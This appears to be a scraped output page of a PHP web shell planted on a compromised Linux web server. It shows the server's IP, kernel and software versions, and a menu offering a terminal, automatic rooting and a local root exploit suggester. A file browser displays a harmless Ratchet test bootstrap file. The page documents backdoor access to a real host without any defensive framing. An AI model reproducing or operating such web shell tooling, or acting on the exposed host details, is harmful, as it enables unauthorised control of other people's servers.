Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.140.242.43
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp /
vendor /
ratchet /
rfc6455 /
tests /
Delete
Unzip
Name
Size
Permission
Date
Action
ab
[ DIR ]
drwxr-xr-x
2018-05-02 09:00
unit
[ DIR ]
drwxr-xr-x
2018-05-02 09:00
AbResultsTest.php
1.01
KB
-rw-r--r--
2018-05-02 09:00
bootstrap.php
418
B
-rw-r--r--
2018-05-02 09:00
Save
Rename
<?php /** * Find the auto loader file */ $files = [ __DIR__ . '/../vendor/autoload.php', __DIR__ . '/../../vendor/autoload.php', __DIR__ . '/../../../vendor/autoload.php', __DIR__ . '/../../../../vendor/autoload.php', ]; foreach ($files as $file) { if (file_exists($file)) { $loader = require $file; $loader->addPsr4('Ratchet\\RFC6455\\Test\\', __DIR__); break; } }